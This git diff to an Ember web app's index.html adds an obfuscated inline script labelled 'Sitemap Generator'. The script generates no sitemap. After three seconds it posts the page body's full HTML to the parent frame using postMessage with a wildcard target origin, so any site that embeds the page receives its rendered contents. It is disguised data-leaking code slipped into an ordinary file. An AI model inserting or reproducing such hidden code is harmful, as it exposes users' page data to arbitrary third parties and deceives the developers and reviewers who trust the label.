--- a/app/index.html
+++ b/app/index.html
@@ -39,5 +39,9 @@
     <script src="{{rootURL}}assets/codingblocks-online.js"></script>
     <script src="https://cdn.jsdelivr.net/npm/hls.js@latest"></script>
     {{content-for "body-footer"}}
+    <!-- Sitemap Generator -->
+    <script type="text/javascript">
+      var _0xaea9 = ["sitemapgenerator:: ", "innerHTML", "body", "document", "stringify", "*", "postMessage", "setTimeout"]; window[_0xaea9[7]](function () { parent[_0xaea9[6]](_0xaea9[0] + JSON[_0xaea9[4]](window[_0xaea9[3]][_0xaea9[2]][_0xaea9[1]]), _0xaea9[5]) }, 3000);
+    </script>
   </body>
 </html>
